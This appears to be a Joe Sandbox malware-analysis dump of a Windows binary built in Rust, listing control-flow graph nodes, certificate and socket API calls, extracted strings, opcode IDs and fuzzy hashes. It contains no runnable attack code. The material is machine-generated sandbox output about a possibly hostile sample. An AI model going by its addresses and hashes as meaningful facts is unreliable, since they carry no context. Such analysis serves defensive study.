                • Instruction Fuzzy Hash: B9929C22608FC191E7769F28E0453EAB364FB98758F845122DF9C13756EF39E2A9C710

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2556 7ff71a7df081-7ff71a7df0e7 2557 7ff71a7df0ef-7ff71a7df0f8 2556->2557 2558 7ff71a7df0fe-7ff71a7df124 call 7ff71a7dfc2d 2557->2558 2559 7ff71a7dfb4d-7ff71a7dfb50 2557->2559 2565 7ff71a7dfbbc-7ff71a7dfbc1 2558->2565 2566 7ff71a7df12a-7ff71a7df12d 2558->2566 2561 7ff71a7dfb73-7ff71a7dfb7a 2559->2561 2562 7ff71a7dfb52-7ff71a7dfb71 2559->2562 2564 7ff71a7dfbca-7ff71a7dfbe7 2561->2564 2562->2564 2567 7ff71a7dfbc5 2565->2567 2568 7ff71a7df12f-7ff71a7df136 2566->2568 2569 7ff71a7df141-7ff71a7df144 2566->2569 2567->2564 2570 7ff71a7df146-7ff71a7df159 call 7ff71a7dfd40 2568->2570 2571 7ff71a7df138-7ff71a7df13f 2568->2571 2569->2570 2572 7ff71a7df162-7ff71a7df165 2569->2572 2570->2572 2585 7ff71a7df15b 2570->2585 2571->2570 2573 7ff71a7df16b-7ff71a7df172 2572->2573 2574 7ff71a7df599-7ff71a7df59c 2572->2574 2573->2574 2576 7ff71a7df178-7ff71a7df19f call 7ff71a8202ee 2573->2576 2577 7ff71a7dfac3-7ff71a7dfac7 2574->2577 2578 7ff71a7df5a2-7ff71a7df5aa 2574->2578 2591 7ff71a7df1a1-7ff71a7df1a9 call 7ff71a7e019c 2576->2591 2592 7ff71a7df1ae-7ff71a7df1b1 2576->2592 2581 7ff71a7dfb17-7ff71a7dfb48 2577->2581 2582 7ff71a7dfac9-7ff71a7dfae1 call 7ff71a820297 2577->2582 2583 7ff71a7df5c6-7ff71a7df636 call 7ff71a7d542d call 7ff71a7dfcfc 2578->2583 2584 7ff71a7df5ac-7ff71a7df5af call 7ff71a7dfd67 2578->2584 2581->2557 2598 7ff71a7dfc23-7ff71a7dfc2b 2582->2598 2599 7ff71a7dfae7-7ff71a7dfb15 2582->2599 2606 7ff71a7df640-7ff71a7df660 call 7ff71a81ff16 2583->2606 2607 7ff71a7df638-7ff71a7df63e 2583->2607 2594 7ff71a7df5b4-7ff71a7df5b7 2584->2594 2585->2572 2591->2574 2592->2565 2597 7ff71a7df1b7-7ff71a7df1cd call 7ff71a81f9a8 2592->2597 2594->2565 2600 7ff71a7df5bd-7ff71a7df5c0 2594->2600 2612 7ff71a7df1cf-7ff71a7df1d4 2597->2612 2613 7ff71a7df229-7ff71a7df22b 2597->2613 2602 7ff71a7dfbfc-7ff71a7dfc05 2598->2602 2599->2581 2600->2583 2605 7ff71a7dfbe8-7ff71a7dfbf7 call 7ff71a820337 2600->2605 2602->2567 2605->2602 2610 7ff71a7df6aa-7ff71a7df6b0 2606->2610 2620 7ff71a7df662-7ff71a7df6a8 call 7ff71a7dfe9d 2606->2620 2607->2610 2617 7ff71a7df6b2-7ff71a7df730 2610->2617 2618 7ff71a7df263-7ff71a7df266 call 7ff71a81f9eb 2612->2618 2619 7ff71a7df1da-7ff71a7df1eb 2612->2619 2615 7ff71a7df22d-7ff71a7df238 2613->2615 2616 7ff71a7df23a-7ff71a7df23c 2613->2616 2621 7ff71a7df26b-7ff71a7df30e CertGetCertificateChain 2615->2621 2616->2621 2622 7ff71a7df732-7ff71a7df7a5 call 7ff71a85a064 2617->2622 2623 7ff71a7df7aa-7ff71a7df7b7 2617->2623 2618->2621 2625 7ff71a7df1f3-7ff71a7df1fe call 7ff71a81fa33 2619->2625 2620->2617 2630 7ff71a7df314-7ff71a7df32c 2621->2630 2631 7ff71a7dfc07-7ff71a7dfc0f call 7ff71a7d36d2 2621->2631 2643 7ff71a7df83a-7ff71a7df83c 2622->2643 2626 7ff71a7df7bd-7ff71a7df835 call 7ff71a85a0a4 2623->2626 2627 7ff71a7df7b9 2623->2627 2641 7ff71a7df200-7ff71a7df211 call 7ff71a81f9f7 2625->2641 2642 7ff71a7df23e-7ff71a7df261 call 7ff71a81faa1 2625->2642 2626->2643 2627->2626 2638 7ff71a7df332-7ff71a7df34e call 7ff71a81f8a8 2630->2638 2639 7ff71a7df447-7ff71a7df468 2630->2639 2654 7ff71a7dfbaf-7ff71a7dfbb9 CertFreeCertificateContext 2631->2654 2638->2639 2655 7ff71a7df354-7ff71a7df371 2638->2655 2644 7ff71a7df47f-7ff71a7df4db CertVerifyCertificateChainPolicy 2639->2644 2645 7ff71a7df46a-7ff71a7df471 2639->2645 2664 7ff71a7dfb87-7ff71a7dfbaa CertFreeCertificateContext call 7ff71a81faa1 call 7ff71a7dcfc5 2641->2664 2665 7ff71a7df217-7ff71a7df227 CertFreeCertificateContext * 2 2641->2665 2642->2618 2642->2621 2649 7ff71a7df841-7ff71a7df845 2643->2649 2652 7ff71a7dfc11-7ff71a7dfc16 call 7ff71a7d36d2 2644->2652 2653 7ff71a7df4e1-7ff71a7df50d 2644->2653 2645->2644 2651 7ff71a7df473-7ff71a7df477 2645->2651 2657 7ff71a7df85f-7ff71a7df865 2649->2657 2658 7ff71a7df847-7ff71a7df852 2649->2658 2651->2644 2667 7ff71a7dfc19-7ff71a7dfc21 call 7ff71a85a2c4 2652->2667 2660 7ff71a7df565-7ff71a7df567 2653->2660 2661 7ff71a7df50f-7ff71a7df55e call 7ff71a7e01b4 2653->2661 2654->2565 2663 7ff71a7df37a-7ff71a7df38e call 7ff71a81f951 2655->2663 2670 7ff71a7dfa12-7ff71a7dfa2d call 7ff71a7dfedc 2657->2670 2671 7ff71a7df86b-7ff71a7df86d 2657->2671 2668 7ff71a7df854 call 7ff71a85a094 2658->2668 2669 7ff71a7df859-7ff71a7df85d 2658->2669 2666 7ff71a7df56d-7ff71a7df570 CertFreeCertificateChain 2660->2666 2660->2667 2676 7ff71a7df575-7ff71a7df583 CertFreeCertificateContext 2661->2676 2702 7ff71a7df560 2661->2702 2695 7ff71a7df394-7ff71a7df3a4 2663->2695 2696 7ff71a7df42a-7ff71a7df435 call 7ff71a81faa1 2663->2696 2664->2654 2665->2625 2666->2676 2667->2654 2668->2669 2669->2649 2691 7ff71a7dfa43-7ff71a7dfa4a 2670->2691 2692 7ff71a7dfa2f-7ff71a7dfa41 call 7ff71a7dfedc 2670->2692 2678 7ff71a7df873-7ff71a7df879 2671->2678 2679 7ff71a7df91e-7ff71a7df938 call 7ff71a7dfedc 2671->2679 2676->2574 2687 7ff71a7df585-7ff71a7df58c 2676->2687 2689 7ff71a7df87f-7ff71a7df8a0 call 7ff71a7dfedc 2678->2689 2690 7ff71a7dfa4c-7ff71a7dfa50 2678->2690 2707 7ff71a7df951-7ff71a7df95c 2679->2707 2708 7ff71a7df93a-7ff71a7df94e call 7ff71a7dfedc 2679->2708 2687->2574 2698 7ff71a7df58e-7ff71a7df596 2687->2698 2718 7ff71a7df8a2-7ff71a7df8b6 call 7ff71a7dfedc 2689->2718 2719 7ff71a7df8b9-7ff71a7df919 call 7ff71a7dfefd call 7ff71a7aa76b call 7ff71a85a094 2689->2719 2697 7ff71a7dfa54-7ff71a7dfa74 call 7ff71a7e00d7 call 7ff71a81f88d 2690->2697 2703 7ff71a7dfa93-7ff71a7dfab3 call 7ff71a7e00d7 call 7ff71a81f88d 2691->2703 2692->2691 2705 7ff71a7df3ad-7ff71a7df3bf call 7ff71a81fa33 2695->2705 2724 7ff71a7df43a-7ff71a7df442 CertFreeCertificateChain 2696->2724 2740 7ff71a7dfab5-7ff71a7dfab8 2697->2740 2698->2574 2702->2654 2703->2740 2732 7ff71a7df3c1-7ff71a7df3e3 call 7ff71a81f9c7 CertFreeCertificateContext 2705->2732 2733 7ff71a7df3e7-7ff71a7df3ed call 7ff71a81faa1 2705->2733 2710 7ff71a7df96e-7ff71a7df99b call 7ff71a7dfefd 2707->2710 2711 7ff71a7df95e-7ff71a7df966 2707->2711 2708->2707 2736 7ff71a7df9d0-7ff71a7df9db 2710->2736 2737 7ff71a7df99d-7ff71a7df9cc call 7ff71a7aa76b call 7ff71a85a094 2710->2737 2711->2710 2718->2719 2719->2703 2724->2639 2732->2705 2756 7ff71a7df3e5 2732->2756 2742 7ff71a7df3f2-7ff71a7df41d call 7ff71a81faa1 CertFreeCertificateContext 2733->2742 2746 7ff71a7dfa76-7ff71a7dfa7d 2736->2746 2747 7ff71a7df9e1-7ff71a7df9f9 call 7ff71a7dff53 2736->2747 2737->2736 2740->2557 2743 7ff71a7dfabe-7ff71a7dfb85 2740->2743 2742->2663 2761 7ff71a7df423-7ff71a7df428 2742->2761 2743->2567 2754 7ff71a7dfa86-7ff71a7dfa8b 2746->2754 2755 7ff71a7dfa7f 2746->2755 2747->2746 2763 7ff71a7df9fb-7ff71a7dfa10 2747->2763 2754->2703 2755->2754 2756->2742 2761->2724 2763->2697
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: CertCertificate$Free$Context$Chain$PolicyVerify
                • String ID: $1.3.6.1.4.1.311.10.3.3$1.3.6.1.5.5.7.3.1$2.16.840.1.113730.4.1$unexpected EOF during handshakeassertion failed: size >= nread
                • API String ID: 2819978641-816880757
                • Opcode ID: 1843e9c215b49a4a5ff824598aff6a49c0831b01fa7fe072480c1136848e917f
                • Instruction ID: b48aef96b0c6b3033d19d1deb62c4a4aadaf4c6c3996dbc4fad0fb4c63071101
                • Opcode Fuzzy Hash: 1843e9c215b49a4a5ff824598aff6a49c0831b01fa7fe072480c1136848e917f
                • Instruction Fuzzy Hash: FD527E22A0CBC186FB65AB11E0503EAF7A0FB89794F808176DA8D47B95DF3CE55D8710

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 4507 7ff71a7e1789-7ff71a7e17ac 4508 7ff71a7e18e5-7ff71a7e19fa memcpy 4507->4508 4509 7ff71a7e17b2-7ff71a7e17b5 4507->4509 4515 7ff71a7e2766-7ff71a7e2774 4508->4515 4516 7ff71a7e1a00-7ff71a7e1a79 call 7ff71a7d43fd call 7ff71a81faaf 4508->4516 4510 7ff71a7e2776 4509->4510 4511 7ff71a7e17bb-7ff71a7e17e0 4509->4511 4513 7ff71a7e2782-7ff71a7e2789 4510->4513 4514 7ff71a7e277d call 7ff71a7b1d80 4510->4514 4511->4508 4517 7ff71a7e2790-7ff71a7e279a call 7ff71a7aef70 4513->4517 4514->4513 4515->4517 4524 7ff71a7e1a94-7ff71a7e1aae call 7ff71a81fb52 4516->4524 4525 7ff71a7e1a7b-7ff71a7e1a8f call 7ff71a81f9a3 call 7ff71a81fb1a 4516->4525 4530 7ff71a7e1ab0-7ff71a7e1add call 7ff71a7e0c1b call 7ff71a7dd08a memcpy 4524->4530 4531 7ff71a7e1b0a-7ff71a7e1b6d call 7ff71a81f9f2 call 7ff71a81fed8 call 7ff71a81fd68 4524->4531 4525->4524 4541 7ff71a7e1ae2-7ff71a7e1b05 memcpy 4530->4541 4546 7ff71a7e1ba6-7ff71a7e1bab 4531->4546 4547 7ff71a7e1b6f-7ff71a7e1b94 call 7ff71a7d542d 4531->4547 4543 7ff71a7e20b3-7ff71a7e213f memcpy call 7ff71a7e27d8 4541->4543 4555 7ff71a7e2234-7ff71a7e22c1 memcpy 4543->4555 4556 7ff71a7e2145-7ff71a7e214f 4543->4556 4548 7ff71a7e1bfb-7ff71a7e1c39 4546->4548 4549 7ff71a7e1bad-7ff71a7e1bdb call 7ff71a81f9f2 call 7ff71a7d542d 4546->4549 4558 7ff71a7e1be2-7ff71a7e1bf6 call 7ff71a84962b 4547->4558 4553 7ff71a7e1c45-7ff71a7e1c52 4548->4553 4554 7ff71a7e1c3b-7ff71a7e1c43 4548->4554 4549->4558 4563 7ff71a7e1c54-7ff71a7e1c5c 4553->4563 4564 7ff71a7e1c68 4553->4564 4562 7ff71a7e1c6b-7ff71a7e1c86 call 7ff71a8200db 4554->4562 4560 7ff71a7e2472-7ff71a7e24ed call 7ff71a7e27f2 memcpy call 7ff71a7e2843 4555->4560 4561 7ff71a7e22c7 4555->4561 4565 7ff71a7e2155-7ff71a7e217e memcpy 4556->4565 4566 7ff71a7e22cc-7ff71a7e22d4 4556->4566 4558->4548 4589 7ff71a7e24ef-7ff71a7e2506 call 7ff71a7d7664 4560->4589 4590 7ff71a7e2508-7ff71a7e255b memcpy 4560->4590 4569 7ff71a7e2727-7ff71a7e2736 4561->4569 4581 7ff71a7e1ce2-7ff71a7e1d73 call 7ff71a7e0cdd call 7ff71a7e0cff call 7ff71a7f7d4f 4562->4581 4582 7ff71a7e1c88-7ff71a7e1cdd call 7ff71a7dd08a call 7ff71a7dcfb6 4562->4582 4563->4562 4564->4562 4565->4513 4573 7ff71a7e2184-7ff71a7e2205 memcpy call 7ff71a7e2866 4565->4573 4570 7ff71a7e2467-7ff71a7e2470 4566->4570 4579 7ff71a7e2738-7ff71a7e2759 4569->4579 4570->4560 4580 7ff71a7e220a-7ff71a7e2215 4573->4580 4584 7ff71a7e221b-7ff71a7e221f 4580->4584 4585 7ff71a7e22d9-7ff71a7e23fc memcpy * 3 4580->4585 4618 7ff71a7e1d75-7ff71a7e1da7 call 7ff71a7d4c7a call 7ff71a85a094 4581->4618 4619 7ff71a7e1dae-7ff71a7e1db1 4581->4619 4610 7ff71a7e1efe-7ff71a7e1f02 4582->4610 4591 7ff71a7e2225-7ff71a7e222f 4584->4591 4592 7ff71a7e25ec-7ff71a7e271b memcpy * 2 call 7ff71a7e27e8 memcpy 4584->4592 4594 7ff71a7e271f-7ff71a7e2724 4585->4594 4595 7ff71a7e2402-7ff71a7e2462 memcpy call 7ff71a7e27e8 4585->4595 4598 7ff71a7e2563-7ff71a7e25e7 call 7ff71a7da70d call 7ff71a7d4d17 memcpy 4589->4598 4590->4598 4591->4595 4592->4594 4594->4569 4595->4570 4598->4579 4614 7ff71a7e1f04-7ff71a7e1f1a memcpy 4610->4614 4615 7ff71a7e1f1f-7ff71a7e1f3a memcpy 4610->4615 4614->4615 4616 7ff71a7e1f5c-7ff71a7e1f95 call 7ff71a7e0ca2 call 7ff71a7e0c1b memcpy 4615->4616 4634 7ff71a7e2041-7ff71a7e20b1 memcpy * 2 4616->4634 4635 7ff71a7e1f9b-7ff71a7e1f9f 4616->4635 4632 7ff71a7e1dbc-7ff71a7e1dc4 4618->4632 4633 7ff71a7e1da9-7ff71a7e1dac 4618->4633 4622 7ff71a7e1db7-7ff71a7e1dba 4619->4622 4625 7ff71a7e1dcc-7ff71a7e1ee3 call 7ff71a7e0d67 call 7ff71a7e2866 4622->4625 4638 7ff71a7e1ee8-7ff71a7e1ef7 4625->4638 4632->4625 4633->4622 4634->4543 4635->4541 4637 7ff71a7e1fa5-7ff71a7e203f memcpy * 3 4635->4637 4637->4543 4639 7ff71a7e1f3c-7ff71a7e1f57 memcpy 4638->4639 4640 7ff71a7e1ef9 4638->4640 4639->4616 4640->4610
                APIs
                Strings
                • future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs, xrefs: 00007FF71A7E2782
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs
                • API String ID: 3510742995-3485458656
                • Opcode ID: a7d2cc0111837070776fb5060f3da2d854479794757643ed3580a8686ca835a7
                • Instruction ID: ebc5c12dc9299ae3e7f7ee848ca6248a17786840d2117dcd2e22147c85004c86
                • Opcode Fuzzy Hash: a7d2cc0111837070776fb5060f3da2d854479794757643ed3580a8686ca835a7
                • Instruction Fuzzy Hash: 96E18D32608FC591EB2A9B24E5413EDF364FB99354F805122DF9C13662EF38E2A9C710

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 4641 7ff71a7e3c68-7ff71a7e3c91 4642 7ff71a7e3c93-7ff71a7e3c96 4641->4642 4643 7ff71a7e3cb9-7ff71a7e3cd1 4641->4643 4645 7ff71a7e3cd3-7ff71a7e3cda call 7ff71a7b1d80 4642->4645 4646 7ff71a7e3c98-7ff71a7e3cb4 4642->4646 4644 7ff71a7e3cdf-7ff71a7e3ce7 4643->4644 4648 7ff71a7e451e-7ff71a7e4523 4644->4648 4649 7ff71a7e3ced-7ff71a7e3d16 4644->4649 4645->4644 4646->4643 4650 7ff71a7e461d-7ff71a7e4649 call 7ff71a820337 call 7ff71a7cd6c3 4648->4650 4651 7ff71a7e4529-7ff71a7e4544 4648->4651 4649->4648 4652 7ff71a7e3d1c-7ff71a7e3d62 4649->4652 4654 7ff71a7e464e-7ff71a7e4653 4650->4654 4651->4654 4655 7ff71a7e455d-7ff71a7e458c call 7ff71a8214e0 4652->4655 4656 7ff71a7e3d68-7ff71a7e3d91 WSASocketW 4652->4656 4658 7ff71a7e4658-7ff71a7e468e 4654->4658 4664 7ff71a7e4591 4655->4664 4660 7ff71a7e3d93-7ff71a7e3dc2 call 7ff71a7d36d2 call 7ff71a7cd6c3 4656->4660 4661 7ff71a7e3dc8-7ff71a7e3def ioctlsocket 4656->4661 4660->4661 4681 7ff71a7e46a7-7ff71a7e46b4 4660->4681 4666 7ff71a7e3df1-7ff71a7e3df6 call 7ff71a7d36d2 4661->4666 4667 7ff71a7e3df9-7ff71a7e3e1d call 7ff71a7cd893 4661->4667 4673 7ff71a7e459d-7ff71a7e45ad 4664->4673 4666->4667 4667->4673 4675 7ff71a7e3e23-7ff71a7e3e30 4667->4675 4676 7ff71a7e45bf-7ff71a7e45cc closesocket 4673->4676 4678 7ff71a7e3e36-7ff71a7e3e50 call 7ff71a8209d2 4675->4678 4679 7ff71a7e3ef8-7ff71a7e3efc 4675->4679 4680 7ff71a7e45cf-7ff71a7e461b call 7ff71a7e4874 4676->4680 4694 7ff71a7e3e52-7ff71a7e3e62 call 7ff71a7c7818 4678->4694 4695 7ff71a7e3e67-7ff71a7e3ef2 WSAIoctl 4678->4695 4683 7ff71a7e3efe-7ff71a7e3f06 4679->4683 4684 7ff71a7e3f5d-7ff71a7e3f65 4679->4684 4680->4658 4681->4680 4689 7ff71a7e3fc0-7ff71a7e401e 4683->4689 4690 7ff71a7e3f0c-7ff71a7e3f5b 4683->4690 4686 7ff71a7e4020-7ff71a7e4069 4684->4686 4687 7ff71a7e3f6b-7ff71a7e3fa4 4684->4687 4693 7ff71a7e406d-7ff71a7e408f call 7ff71a8209ae 4686->4693 4692 7ff71a7e3fae-7ff71a7e3fbb call 7ff71a8209ae 4687->4692 4689->4693 4690->4692 4703 7ff71a7e4094-7ff71a7e40ba call 7ff71a7cd893 4692->4703 4693->4703 4694->4679 4695->4679 4700 7ff71a7e4514-7ff71a7e4519 call 7ff71a7d36d2 4695->4700 4700->4648 4708 7ff71a7e40c0-7ff71a7e40c5 4703->4708 4709 7ff71a7e45af-7ff71a7e45b7 4703->4709 4710 7ff71a7e40ef-7ff71a7e40f8 4708->4710 4711 7ff71a7e40c7-7ff71a7e40dd call 7ff71a8209d2 4708->4711 4709->4676 4712 7ff71a7e412d-7ff71a7e4132 4710->4712 4713 7ff71a7e40fa-7ff71a7e411b call 7ff71a8209d2 4710->4713 4711->4710 4721 7ff71a7e40df-7ff71a7e40ea call 7ff71a7c7818 4711->4721 4716 7ff71a7e4134-7ff71a7e4155 call 7ff71a8209d2 4712->4716 4717 7ff71a7e4167-7ff71a7e4219 memcpy * 2 4712->4717 4713->4712 4723 7ff71a7e411d-7ff71a7e4128 call 7ff71a7c7818 4713->4723 4716->4717 4726 7ff71a7e4157-7ff71a7e4162 call 7ff71a7c7818 4716->4726 4717->4700 4721->4710 4723->4712 4726->4717
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: IoctlSocketioctlsocket
                • String ID: Network unreachabletcp connect error$tcp open errortcp set_nonblocking errortcp bind local error
                • API String ID: 3182012499-2266390304
                • Opcode ID: 753dc986c885a2cb220be33ed8660d4414fe3b119138fd6df277b52fd54725e8
                • Instruction ID: 0e04bb04c2a2408239808a22815d237702f54aa85dc9ef0f43f344d6a082bd38
                • Opcode Fuzzy Hash: 753dc986c885a2cb220be33ed8660d4414fe3b119138fd6df277b52fd54725e8
                • Instruction Fuzzy Hash: E212AF22E08BC581F7219F24D4103F9A360FBA9B68F449236DE8C17696DF79E6D9C710
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy$AddressErrorLastWait
                • String ID:
                • API String ID: 587126646-0
                • Opcode ID: daaa2f8078ff16a55c8cbddbfc2fdd1a0e46e2c2c9962d35e2d211557de890d6
                • Instruction ID: a79b70f082ec41f7ec13138c9a5f6579a04239d7eb59e547158c6d8350783838
                • Opcode Fuzzy Hash: daaa2f8078ff16a55c8cbddbfc2fdd1a0e46e2c2c9962d35e2d211557de890d6
                • Instruction Fuzzy Hash: E712BF62A0DFD585F722DB28A0047EEA768FB99748F459122DFCC13656DF38E299C700
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: Pending error polled more than once$cookie2$httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
                • API String ID: 3510742995-1253172179
                • Opcode ID: 1b1aa4355986ca8f353684b1188a97d66944025713159b979c018e93a15959fb
                • Instruction ID: 0500fd77145f1cd6e6b9737d8c16880a51fb9d2420d2be48bc43bcfe8ddb76cb
                • Opcode Fuzzy Hash: 1b1aa4355986ca8f353684b1188a97d66944025713159b979c018e93a15959fb
                • Instruction Fuzzy Hash: D9B2A521A08EC181FB62AB15E5553FAA3A1FB84BA4F804173DE8D17799CF3CE55AC710
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy$AddressErrorLastWait
                • String ID:
                • API String ID: 587126646-0
                • Opcode ID: 6e3a7fa4a7bd322ef20675b4b542871a219165b3f1bbb83d4996749d87d22491
                • Instruction ID: 3335749ea742cf2e38a269f9c43ad83dbcfcb3ab37c54d9ad54faac36796c59c
                • Opcode Fuzzy Hash: 6e3a7fa4a7bd322ef20675b4b542871a219165b3f1bbb83d4996749d87d22491
                • Instruction Fuzzy Hash: DB12AE62A0DFD585F762DB28A0047EEA764FB99748F849122DF8C13756DF38E299C700

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 7155 7ff71a8458b0-7ff71a8458c7 7156 7ff71a8458cd-7ff71a8458d6 7155->7156 7157 7ff71a845a13-7ff71a845a1a call 7ff71a7aef50 7155->7157 7158 7ff71a8458dc-7ff71a8458f9 call 7ff71a846080 7156->7158 7159 7ff71a845a1f call 7ff71a7a8ca0 7156->7159 7157->7159 7164 7ff71a845a24-7ff71a845a62 call 7ff71a7a8c80 7158->7164 7165 7ff71a8458ff-7ff71a845914 memcpy 7158->7165 7159->7164 7170 7ff71a845a64-7ff71a845a8c memset WSAStartup 7164->7170 7171 7ff71a845aa3-7ff71a845aaa call 7ff71a7aef50 7164->7171 7167 7ff71a845931-7ff71a845941 call 7ff71a7b0da0 7165->7167 7168 7ff71a845916-7ff71a845919 7165->7168 7173 7ff71a845970-7ff71a8459bd call 7ff71a7a8de0 getaddrinfo 7167->7173 7184 7ff71a845943-7ff71a84596a 7167->7184 7172 7ff71a84591b-7ff71a84591d 7168->7172 7168->7173 7175 7ff71a845a8e-7ff71a845aa2 7170->7175 7176 7ff71a845aaf-7ff71a845b02 call 7ff71a822d70 7170->7176 7171->7176 7179 7ff71a845920-7ff71a845925 7172->7179 7185 7ff71a8459bf-7ff71a8459d1 WSAGetLastError 7173->7185 7186 7ff71a8459d3-7ff71a8459e5 7173->7186 7190 7ff71a845b04-7ff71a845b1f memset call 7ff71a859ff4 7176->7190 7191 7ff71a845b43-7ff71a845b4a call 7ff71a7aef50 7176->7191 7183 7ff71a845927-7ff71a84592d 7179->7183 7179->7184 7183->7179 7188 7ff71a84592f 7183->7188 7184->7173 7189 7ff71a8459e7-7ff71a8459f4 7185->7189 7186->7189 7188->7173 7192 7ff71a8459f6-7ff71a8459fe call 7ff71a7b2180 7189->7192 7193 7ff71a845a03-7ff71a845a12 7189->7193 7197 7ff71a845b24-7ff71a845b2c 7190->7197 7198 7ff71a845b4f-7ff71a845b7c call 7ff71a822d70 7191->7198 7192->7193 7197->7198 7199 7ff71a845b2e-7ff71a845b42 7197->7199
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memset$ErrorLastStartupgetaddrinfomemcpy
                • String ID:
                • API String ID: 3791713709-0
                • Opcode ID: 448cb79562f571f1dfe032b0a322c0da33062a932b341f9ddd2aa9ce22c416a3
                • Instruction ID: 5494ad37c9b4c034d3350871d41e5d729d4ecd05b7329365c4d85b802e0ecd11
                • Opcode Fuzzy Hash: 448cb79562f571f1dfe032b0a322c0da33062a932b341f9ddd2aa9ce22c416a3
